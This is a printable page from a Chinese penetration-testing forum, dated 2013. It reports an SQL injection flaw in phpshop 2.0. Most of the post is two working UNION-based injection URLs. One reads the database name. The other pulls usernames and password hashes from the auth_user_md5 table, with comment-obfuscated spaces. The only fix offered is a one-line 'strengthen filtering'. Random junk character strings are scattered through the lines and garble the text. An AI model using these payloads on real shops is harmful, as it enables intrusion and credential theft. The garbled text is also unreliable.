中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
/ H/ _0 H1 z0 _7 d/ n2 p1 h  m  ?8 V2 m7 a
作者 : By onestree1 n+ @, k" f3 {, p
下载地址 : http://code.google.com/p/phpshop/downloads/list5 Y! M. _- N- B5 X% z& w# `. u
测试地址: windows 7 / ubuntu4 [8 e# _' a  J5 Y: k0 v/ N
* ]5 N  Z( |/ f0 Z( ~) I( I& d7 o" N4 t

6 g0 a5 }- S" p0 G7 s: MSQLi p0c:
, z) ?, G- U2 o7 G " D; e/ q4 G' `) d: e: }, Q( e
==================* i$ D! Y: n$ ^. F
. f$ F4 q/ N$ \
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
* V3 n& B( ^0 g- Uunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --( f4 q; V3 z* Y, X. e
; B+ F. ~" V+ p. d0 k
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
8 Z6 R% L/ Z  p9 y) r/ v$ H* v$ ]0 H* D
修复:% H1 N& V7 M9 c4 m! R( M% I
加强过滤% O# u- S  x# a$ q) n
# k8 u% e% @+ t1 G1 W

+ S3 {( n2 ^* [( Q  y( y$ M* ^



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2